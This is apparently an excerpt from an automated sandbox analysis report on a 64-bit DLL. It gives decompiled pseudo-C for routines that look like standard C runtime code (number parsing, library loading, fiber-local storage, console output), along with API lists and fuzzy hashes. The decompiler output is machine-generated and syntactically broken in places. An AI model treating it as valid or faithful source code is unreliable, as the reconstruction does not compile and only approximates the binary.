				 *_t394 = _t406 + 2;
				_t260 = r13d;
				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x94f89fb;
				0x94f9140();
				goto 0x94f89fb;
				_t378 =  *_t397;
				 *_t397 =  &(( *_t397)[1]);
				if (E00007FFA7FFA094FB244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x94f89ee;
				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x94f8a32;
				_t380 =  *_t397;
				_t199 =  *_t380 & 0x0000ffff;
				_t381 =  &(_t380[1]);
				 *_t397 = _t381;
				_a16 = 0xa70;
				_v152 = 0xae6;
				_v148 = 0xaf0;
				_v144 = 0xb66;
				r8d = 0x660;
				_v140 = 0xb70;
				_t20 = _t381 - 0x80; // 0x5e0
				r9d = _t20;
				_v136 = 0xc66;
				r10d = 0x6f0;
				_v132 = 0xc70;
				r11d = 0x966;
				_v128 = 0xce6;
				_v124 = 0xcf0;
				_v120 = 0xd66;
				_v116 = 0xd70;
				_v112 = 0xe50;
				_v108 = 0xe5a;
				_v104 = 0xed0;
				_v100 = 0xeda;
				_v96 = 0xf20;
				_v92 = 0xf2a;
				_v88 = 0x1040;
				_v84 = 0x104a;
				_v80 = 0x17e0;
				_v76 = 0x17ea;
				_v72 = 0x1810;
				_v68 = 0xff1a;
				if ((r14d & 0xffffffef) != 0) goto 0x94f8da0;
				if (_t199 - 0x30 < 0) goto 0x94f8cef;
				if (_t199 - 0x3a >= 0) goto 0x94f8b3e;
				goto 0x94f8cea;
				if (_t199 - 0xff10 >= 0) goto 0x94f8cdb;
				if (_t199 - r8w < 0) goto 0x94f8cef;
				if (_t199 - 0x66a >= 0) goto 0x94f8b66;
				goto 0x94f8cea;
				if (_t199 - r10w < 0) goto 0x94f8cef;
				if (_t199 - 0x6fa >= 0) goto 0x94f8b85;
				goto 0x94f8cea;
				if (_t199 - r11w < 0) goto 0x94f8cef;
				if (_t199 - 0x970 >= 0) goto 0x94f8ba4;
				goto 0x94f8cea;
				if (_t199 - r9w < 0) goto 0x94f8cef;
				if (_t199 - 0x9f0 >= 0) goto 0x94f8bc3;
				goto 0x94f8cea;
				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x94f8cef;
				if (_t199 - _a16 >= 0) goto 0x94f8be3;
				goto 0x94f8cea;
				if (_t199 - _v152 < 0) goto 0x94f8cef;
				if (_t199 - _v148 < 0) goto 0x94f8b34;
				if (_t199 - _v144 < 0) goto 0x94f8cef;
				if (_t199 - _v140 < 0) goto 0x94f8b34;
				if (_t199 - _v136 < 0) goto 0x94f8cef;
				if (_t199 - _v132 < 0) goto 0x94f8b34;
				if (_t199 - _v128 < 0) goto 0x94f8cef;
				if (_t199 - _v124 < 0) goto 0x94f8b34;
				if (_t199 - _v120 < 0) goto 0x94f8cef;
				if (_t199 - _v116 < 0) goto 0x94f8b34;
				if (_t199 - _v112 < 0) goto 0x94f8cef;
				if (_t199 - _v108 < 0) goto 0x94f8b34;
				if (_t199 - _v104 < 0) goto 0x94f8cef;
				if (_t199 - _v100 < 0) goto 0x94f8b34;
				if (_t199 - _v96 < 0) goto 0x94f8cef;
				if (_t199 - _v92 < 0) goto 0x94f8b34;
				if (_t199 - _v88 < 0) goto 0x94f8cef;
				if (_t199 - _v84 < 0) goto 0x94f8b34;
				if (_t199 - _v80 < 0) goto 0x94f8cef;
				if (_t199 - _v76 < 0) goto 0x94f8b34;
				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x94f8cef;
				goto 0x94f8b34;
				if (_t199 - _v68 >= 0) goto 0x94f8cef;
				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x94f8d11;
				_t64 = _t389 - 0x41; // -17
				_t65 = _t389 - 0x61; // -49
				_t155 = _t65;
				if (_t64 - 0x19 <= 0) goto 0x94f8d06;
				if (_t155 - 0x19 > 0) goto 0x94f8d91;
				if (_t155 - 0x19 > 0) goto 0x94f8d0e;
				_t66 = _t389 - 0x37; // -231
				if (_t66 != 0) goto 0x94f8d91;
				_t390 =  *_t397;
				r9d = 0xffdf;
				_t250 =  *_t390 & 0x0000ffff;
				_t67 =  &(_t390[1]); // 0xffe1
				_t404 = _t67;
				 *_t397 = _t404;
				_t68 = _t394 - 0x58; // 0x698
				if ((r9w & _t68) == 0) goto 0x94f8d79;
				 *_t397 = _t390;
				_t159 =  !=  ? r14d : 8;
				r14d =  !=  ? r14d : 8;
				if (_t250 == 0) goto 0x94f8d71;
				if ( *_t390 == _t250) goto 0x94f8d71;
				E00007FFA7FFA094FB420(_t381);
				 *_t381 = 0x16;
				E00007FFA7FFA094F9744();
				r8d = 0x660;
				r10d = 0x6f0;
				r11d = 0x966;
				goto 0x94f8da0;
				r8d = 0x660;
				goto 0x94f8da0;
				_t200 =  *_t404 & 0x0000ffff;
				_t71 =  &(_t404[1]); // 0xffe3
				_t382 = _t71;
				 *_t397 = _t382;
				r8d = 0x660;
				goto 0x94f8d96;
				_t164 =  !=  ? r14d : 0xa;
				r14d = 0xa;
				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				r12d = 0x30;
				r15d = 0xff10;
				r9d = 0xa / r14d;
				if (_t200 - r12w < 0) goto 0x94f8f70;
				if (_t200 - 0x3a >= 0) goto 0x94f8dd2;
				goto 0x94f8f6b;
				if (_t200 - r15w >= 0) goto 0x94f8f5b;
				if (_t200 - r8w < 0) goto 0x94f8f70;
				if (_t200 - 0x66a >= 0) goto 0x94f8dfb;
				goto 0x94f8f6b;
				if (_t200 - r10w < 0) goto 0x94f8f70;
				if (_t200 - 0x6fa >= 0) goto 0x94f8e1a;
				goto 0x94f8f6b;
				if (_t200 - r11w < 0) goto 0x94f8f70;
				if (_t200 - 0x970 >= 0) goto 0x94f8e39;
				goto 0x94f8f6b;
				if (_t200 - 0x9e6 < 0) goto 0x94f8f70;
				_t76 =  &(_t382[5]); // 0x9f0
				if (_t200 - _t76 >= 0) goto 0x94f8e59;
				goto 0x94f8f6b;
				if (_t200 - 0xa66 < 0) goto 0x94f8f70;
				if (_t200 - _a16 < 0) goto 0x94f8e4f;
				if (_t200 - _v152 < 0) goto 0x94f8f70;
				if (_t200 - _v148 < 0) goto 0x94f8e4f;
				if (_t200 - _v144 < 0) goto 0x94f8f70;
				if (_t200 - _v140 < 0) goto 0x94f8e4f;
				if (_t200 - _v136 < 0) goto 0x94f8f70;
				if (_t200 - _v132 < 0) goto 0x94f8e4f;
				if (_t200 - _v128 < 0) goto 0x94f8f70;
				if (_t200 - _v124 < 0) goto 0x94f8e4f;
				if (_t200 - _v120 < 0) goto 0x94f8f70;
				if (_t200 - _v116 < 0) goto 0x94f8e4f;
				if (_t200 - _v112 < 0) goto 0x94f8f70;
				if (_t200 - _v108 < 0) goto 0x94f8e4f;
				if (_t200 - _v104 < 0) goto 0x94f8f70;
				if (_t200 - _v100 < 0) goto 0x94f8e4f;
				if (_t200 - _v96 < 0) goto 0x94f8f70;
				if (_t200 - _v92 < 0) goto 0x94f8e4f;
				if (_t200 - _v88 < 0) goto 0x94f8f70;
				if (_t200 - _v84 < 0) goto 0x94f8e4f;
				if (_t200 - _v80 < 0) goto 0x94f8f70;
				if (_t200 - _v76 < 0) goto 0x94f8e4f;
				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x94f8f70;
				goto 0x94f8f6b;
				if (_t200 - _v68 >= 0) goto 0x94f8f70;
				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x94f8f93;
				_t100 = _t390 - 0x41; // -65
				_t101 = _t390 - 0x61; // -97
				_t185 = _t101;
				if (_t100 - 0x19 <= 0) goto 0x94f8f83;
				if (_t185 - 0x19 > 0) goto 0x94f8f90;
				if (_t185 - 0x19 > 0) goto 0x94f8f8b;
				goto 0x94f8f93;
				_t405 =  *_t397;
				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x94f8fd7;
				_t201 =  *_t405 & 0x0000ffff;
				_t254 = _t382 + _t390;
				_t261 = _t254;
				_t107 =  &(_t405[1]); // 0x2
				r8d = 0x660;
				 *_t397 = _t107;
				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0x94f8db7;
				_t409 = _a8;
				_t109 = _t405 - 2; // -2
				_t384 = _t109;
				_t407 = _v64;
				 *_t397 = _t384;
				if (_t201 == 0) goto 0x94f9008;
				if ( *_t384 == _t201) goto 0x94f9008;
				E00007FFA7FFA094FB420(_t384);
				 *_t384 = 0x16;
				E00007FFA7FFA094F9744();
				if ((sil & 0x00000008) != 0) goto 0x94f9024;
				_t385 = _t397[1];
				 *_t397 = _t407;
				if (_t385 == 0) goto 0x94f901d;
				 *_t385 = _t407;
				goto 0x94f90a8;
				r8d = 0x80000000;
				_t114 = _t405 - 1; // -1
				r9d = _t114;
				if ((sil & 0x00000004) != 0) goto 0x94f904c;
				if ((sil & 0x00000001) == 0) goto 0x94f908f;
				if ((sil & 0x00000002) == 0) goto 0x94f9047;
				if (_t261 - r8d <= 0) goto 0x94f9095;
				goto 0x94f904c;
				if (_t261 - r9d <= 0) goto 0x94f9097;
				 *((char*)(_t409 + 0x30)) = 1;
				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
				if ((_t258 & 0x00000001) != 0) goto 0x94f9067;
				goto 0x94f9097;
				_t395 = _t397[1];
				if ((_t258 & 0x00000002) == 0) goto 0x94f907f;
				if (_t395 == 0) goto 0x94f907a;
				 *_t395 =  *_t397;
				goto 0x94f90a8;
				if (_t395 == 0) goto 0x94f908a;
				 *_t395 =  *_t397;
				goto 0x94f90a8;
				if ((sil & 0x00000002) == 0) goto 0x94f9097;
				_t396 = _t397[1];
				if (_t396 == 0) goto 0x94f90a6;
				 *_t396 =  *_t397;
				return  ~(_t261 | 0xffffffff);
			}

0x7ffa094f893c
0x7ffa094f893c
0x7ffa094f893c
0x7ffa094f893c
0x7ffa094f8941
0x7ffa094f8958
0x7ffa094f895b
0x7ffa094f895e
0x7ffa094f8962
0x7ffa094f8965
0x7ffa094f896d
0x7ffa094f8973
0x7ffa094f8975
0x7ffa094f897a
0x7ffa094f8980
0x7ffa094f8985
0x7ffa094f898a
0x7ffa094f898c
0x7ffa094f8993
0x7ffa094f8995
0x7ffa094f899a
0x7ffa094f899d
0x7ffa094f89a1
0x7ffa094f89a4
0x7ffa094f89af
0x7ffa094f89b4
0x7ffa094f89b9
0x7ffa094f89c0
0x7ffa094f89c9
0x7ffa094f89cc
0x7ffa094f89db
0x7ffa094f89de
0x7ffa094f89e5
0x7ffa094f89e7
0x7ffa094f89ec
0x7ffa094f89ee
0x7ffa094f89f8
0x7ffa094f8a0a
0x7ffa094f8a1a
0x7ffa094f8a23
0x7ffa094f8a25
0x7ffa094f8a28
0x7ffa094f8a2b
0x7ffa094f8a2f
0x7ffa094f8a32
0x7ffa094f8a42
0x7ffa094f8a4f
0x7ffa094f8a5c
0x7ffa094f8a64
0x7ffa094f8a6a
0x7ffa094f8a72
0x7ffa094f8a72
0x7ffa094f8a76
0x7ffa094f8a7e
0x7ffa094f8a84
0x7ffa094f8a8c
0x7ffa094f8a92
0x7ffa094f8a9a
0x7ffa094f8aa2
0x7ffa094f8aaa
0x7ffa094f8ab2
0x7ffa094f8aba
0x7ffa094f8ac2
0x7ffa094f8aca
0x7ffa094f8ad2
0x7ffa094f8ada
0x7ffa094f8ae2
0x7ffa094f8aea
0x7ffa094f8af2
0x7ffa094f8afa
0x7ffa094f8b02
0x7ffa094f8b0d
0x7ffa094f8b1f
0x7ffa094f8b28
0x7ffa094f8b32
0x7ffa094f8b39
0x7ffa094f8b41
0x7ffa094f8b4b
0x7ffa094f8b59
0x7ffa094f8b61
0x7ffa094f8b6a
0x7ffa094f8b78
0x7ffa094f8b80
0x7ffa094f8b89
0x7ffa094f8b97
0x7ffa094f8b9f
0x7ffa094f8ba8
0x7ffa094f8bb6
0x7ffa094f8bbe
0x7ffa094f8bc6
0x7ffa094f8bd4
0x7ffa094f8bde
0x7ffa094f8bea
0x7ffa094f8bf5
0x7ffa094f8c02
0x7ffa094f8c0d
0x7ffa094f8c1a
0x7ffa094f8c25
0x7ffa094f8c32
0x7ffa094f8c3d
0x7ffa094f8c4a
0x7ffa094f8c55
0x7ffa094f8c62
0x7ffa094f8c6d
0x7ffa094f8c7a
0x7ffa094f8c81
0x7ffa094f8c8e
0x7ffa094f8c95
0x7ffa094f8ca2
0x7ffa094f8ca9
0x7ffa094f8cb6
0x7ffa094f8cbd
0x7ffa094f8cd4
0x7ffa094f8cd6
0x7ffa094f8ce3
0x7ffa094f8ced
0x7ffa094f8cf2
0x7ffa094f8cf8
0x7ffa094f8cf8
0x7ffa094f8cfb
0x7ffa094f8d00
0x7ffa094f8d09
0x7ffa094f8d0e
0x7ffa094f8d13
0x7ffa094f8d15
0x7ffa094f8d18
0x7ffa094f8d1e
0x7ffa094f8d21
0x7ffa094f8d21
0x7ffa094f8d25
0x7ffa094f8d28
0x7ffa094f8d2f
0x7ffa094f8d34
0x7ffa094f8d3c
0x7ffa094f8d40
0x7ffa094f8d46
0x7ffa094f8d4b
0x7ffa094f8d4d
0x7ffa094f8d52
0x7ffa094f8d58
0x7ffa094f8d5d
0x7ffa094f8d63
0x7ffa094f8d69
0x7ffa094f8d6f
0x7ffa094f8d71
0x7ffa094f8d77
0x7ffa094f8d79
0x7ffa094f8d7d
0x7ffa094f8d7d
0x7ffa094f8d81
0x7ffa094f8d84
0x7ffa094f8d8f
0x7ffa094f8d99
0x7ffa094f8d9d
0x7ffa094f8da2
0x7ffa094f8da5
0x7ffa094f8da5
0x7ffa094f8da8
0x7ffa094f8dae
0x7ffa094f8db4
0x7ffa094f8dbb
0x7ffa094f8dc5
0x7ffa094f8dcd
0x7ffa094f8dd6
0x7ffa094f8de0
0x7ffa094f8dee
0x7ffa094f8df6
0x7ffa094f8dff
0x7ffa094f8e0d
0x7ffa094f8e15
0x7ffa094f8e1e
0x7ffa094f8e2c
0x7ffa094f8e34
0x7ffa094f8e41
0x7ffa094f8e47
0x7ffa094f8e4d
0x7ffa094f8e54
0x7ffa094f8e61
0x7ffa094f8e6f
0x7ffa094f8e78
0x7ffa094f8e83
0x7ffa094f8e8c
0x7ffa094f8e97
0x7ffa094f8ea0
0x7ffa094f8eab
0x7ffa094f8eb4
0x7ffa094f8ebf
0x7ffa094f8ec8
0x7ffa094f8ed3
0x7ffa094f8ee0
0x7ffa094f8eeb
0x7ffa094f8ef8
0x7ffa094f8eff
0x7ffa094f8f0c
0x7ffa094f8f13
0x7ffa094f8f20
0x7ffa094f8f27
0x7ffa094f8f34
0x7ffa094f8f3b
0x7ffa094f8f52
0x7ffa094f8f59
0x7ffa094f8f63
0x7ffa094f8f6e
0x7ffa094f8f73
0x7ffa094f8f79
0x7ffa094f8f79
0x7ffa094f8f7c
0x7ffa094f8f81
0x7ffa094f8f86
0x7ffa094f8f8e
0x7ffa094f8f93
0x7ffa094f8f99
0x7ffa094f8f9b
0x7ffa094f8fa5
0x7ffa094f8fb6
0x7ffa094f8fbd
0x7ffa094f8fc4
0x7ffa094f8fcd
0x7ffa094f8fd0
0x7ffa094f8fd2
0x7ffa094f8fd7
0x7ffa094f8fdf
0x7ffa094f8fdf
0x7ffa094f8fe3
0x7ffa094f8feb
0x7ffa094f8ff1
0x7ffa094f8ff6
0x7ffa094f8ff8
0x7ffa094f8ffd
0x7ffa094f9003
0x7ffa094f900c
0x7ffa094f900e
0x7ffa094f9012
0x7ffa094f9018
0x7ffa094f901a
0x7ffa094f901f
0x7ffa094f9024
0x7ffa094f902a
0x7ffa094f902a
0x7ffa094f9032
0x7ffa094f9038
0x7ffa094f903e
0x7ffa094f9043
0x7ffa094f9045
0x7ffa094f904a
0x7ffa094f904e
0x7ffa094f9056
0x7ffa094f9060
0x7ffa094f9065
0x7ffa094f9067
0x7ffa094f906d
0x7ffa094f9072
0x7ffa094f9077
0x7ffa094f907d
0x7ffa094f9082
0x7ffa094f9087
0x7ffa094f908d
0x7ffa094f9093
0x7ffa094f9097
0x7ffa094f909e
0x7ffa094f90a3
0x7ffa094f90c2

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFA094F8980
_invalid_parameter_noinfo.LIBCMT ref: 00007FFA094F8D58
_invalid_parameter_noinfo.LIBCMT ref: 00007FFA094F9003

Strings

0, xrefs: 00007FFA094F8DA8
-, xrefs: 00007FFA094F8A16
p, xrefs: 00007FFA094F8A32
p, xrefs: 00007FFA094F8AAA
f, xrefs: 00007FFA094F8AA2

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$0$f$p$p
API String ID: 3215553584-1865143739
Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction ID: 3a27e2ff6c8c5d14fa8bc27a843b138fbd2c318c9c520b8586501b5e6c809bc0
Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
Instruction Fuzzy Hash: C8129372A191438AFB209F35F06467A7652FB9A754F848131E68E4B7C4DF3EE5A0CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09502FA0 Relevance: 13.7, APIs: 9, Instructions: 181COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 00007FFA09502FCD
SelectObject.GDI32 ref: 00007FFA09502FE5
Polyline.GDI32 ref: 00007FFA09503230
MoveToEx.GDI32 ref: 00007FFA0950325C
LineTo.GDI32 ref: 00007FFA09503285
MoveToEx.GDI32 ref: 00007FFA095032B1
LineTo.GDI32 ref: 00007FFA095032DA
SelectObject.GDI32 ref: 00007FFA095032ED
DeleteObject.GDI32 ref: 00007FFA095032F8

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Object$LineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1917832262-0
Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction ID: 1f7af5f7232e74e4b9848f2614480f676c90b53984fc3fbbfb8fa40313aeabb4
Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
Instruction Fuzzy Hash: 3891CB76618B408ADB65CB29F05132AF7A5F7C9784F148226DACE97B68DF3CD4498F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FD8F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00007FFA7FFA094FD8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t37;
				signed long long _t57;
				intOrPtr _t61;
				signed long long _t72;
				void* _t75;
				signed long long _t76;
				long long _t82;
				void* _t86;
				signed long long _t90;
				signed long long _t91;
				WCHAR* _t93;
				long _t96;
				void* _t99;
				WCHAR* _t104;

				 *((long long*)(_t86 + 8)) = __rbx;
				 *((long long*)(_t86 + 0x10)) = _t82;
				 *((long long*)(_t86 + 0x18)) = __rsi;
				r15d = __ecx;
				_t90 =  *0x956e008; // 0x53c008c84601
				_t76 = _t75 | 0xffffffff;
				_t72 = _t90 ^  *(0x7ffa094f0000 + 0x7f840 + _t104 * 8);
				asm("dec eax");
				if (_t72 == _t76) goto 0x94fda36;
				if (_t72 == 0) goto 0x94fd959;
				_t57 = _t72;
				goto 0x94fda38;
				if (__r8 == __r9) goto 0x94fda1b;
				_t61 =  *((intOrPtr*)(0x7ffa094f0000 + 0x7f7a0 + __rsi * 8));
				if (_t61 == 0) goto 0x94fd980;
				if (_t61 != _t76) goto 0x94fda75;
				goto 0x94fda07;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t99, _t96);
				if (_t57 != 0) goto 0x94fda55;
				if (GetLastError() != 0x57) goto 0x94fd9f5;
				_t14 = _t57 - 0x50; // -80
				_t37 = _t14;
				r8d = _t37;
				if (E00007FFA7FFA094FF5B0(_t90) == 0) goto 0x94fd9f5;
				r8d = _t37;
				if (E00007FFA7FFA094FF5B0(_t90) == 0) goto 0x94fd9f5;
				r8d = 0;
				LoadLibraryExW(_t93, _t75);
				if (_t57 != 0) goto 0x94fda55;
				 *((intOrPtr*)(0x7ffa094f0000 + 0x7f7a0 + __rsi * 8)) = _t76;
				if (__r8 + 4 != __r9) goto 0x94fd962;
				_t91 =  *0x956e008; // 0x53c008c84601
				asm("dec eax");
				 *(0x7ffa094f0000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
				return 0;
			}

0x7ffa094fd8f0
0x7ffa094fd8f5
0x7ffa094fd8fa
0x7ffa094fd90c
0x7ffa094fd927
0x7ffa094fd92e
0x7ffa094fd938
0x7ffa094fd940
0x7ffa094fd946
0x7ffa094fd94f
0x7ffa094fd951
0x7ffa094fd954
0x7ffa094fd95c
0x7ffa094fd965
0x7ffa094fd970
0x7ffa094fd975
0x7ffa094fd97b
0x7ffa094fd98d
0x7ffa094fd993
0x7ffa094fd99f
0x7ffa094fd9ae
0x7ffa094fd9b0
0x7ffa094fd9b0
0x7ffa094fd9b6
0x7ffa094fd9c7
0x7ffa094fd9c9
0x7ffa094fd9dd
0x7ffa094fd9df
0x7ffa094fd9e7
0x7ffa094fd9f3
0x7ffa094fd9ff
0x7ffa094fda0e
0x7ffa094fda14
0x7ffa094fda28
0x7ffa094fda2e
0x7ffa094fda54

APIs

FreeLibrary.KERNEL32 ref: 00007FFA094FDA6F
GetProcAddress.KERNEL32 ref: 00007FFA094FDA7B

Strings

api-ms-, xrefs: 00007FFA094FD9B9
ext-ms-, xrefs: 00007FFA094FD9CC

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction ID: 755144290105ea7dde3393f70cb84c00cfc7de5ccccbb5460895ef85ced74e21
Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction Fuzzy Hash: 1B419E22F19A4381EB169F66B8246B52399AB4BBA0F48C235DD1D47784EF3DE459C304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FB8D4 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFA094FB8E3
FlsGetValue.KERNEL32 ref: 00007FFA094FB8F8
FlsSetValue.KERNEL32 ref: 00007FFA094FB919
FlsSetValue.KERNEL32 ref: 00007FFA094FB946
FlsSetValue.KERNEL32 ref: 00007FFA094FB957
FlsSetValue.KERNEL32 ref: 00007FFA094FB968
SetLastError.KERNEL32 ref: 00007FFA094FB983

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
Instruction ID: 1c791613199c6257dd6781e815376627e96cf0aa21d8aecdeaf9db267a8bb1d2
Opcode Fuzzy Hash: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
Instruction Fuzzy Hash: 03217C24E0D64742FA646F32B56163962429F4F7B0F14C734D96E0B7D6EE2EB465C200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA095028C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFA095028F1
GetLastError.KERNEL32 ref: 00007FFA095028FD
CloseHandle.KERNEL32 ref: 00007FFA09502915
CreateFileW.KERNEL32 ref: 00007FFA09502940
WriteConsoleW.KERNEL32 ref: 00007FFA0950295F

Strings

CONOUT$, xrefs: 00007FFA09502921

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction ID: ca30501f4eb0b196c83a78ad48736f0898c116f96b2888efabcfc93feef3f4a9
Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction Fuzzy Hash: 03116331B18A5186E7508F63F85472962A8FB8EFE4F048234DA5D87794DF3CE5588744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FBA4C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBA5B
FlsSetValue.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBA91
FlsSetValue.KERNEL32(?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000,00007FFA094FD8B7,?,?,?), ref: 00007FFA094FBABE
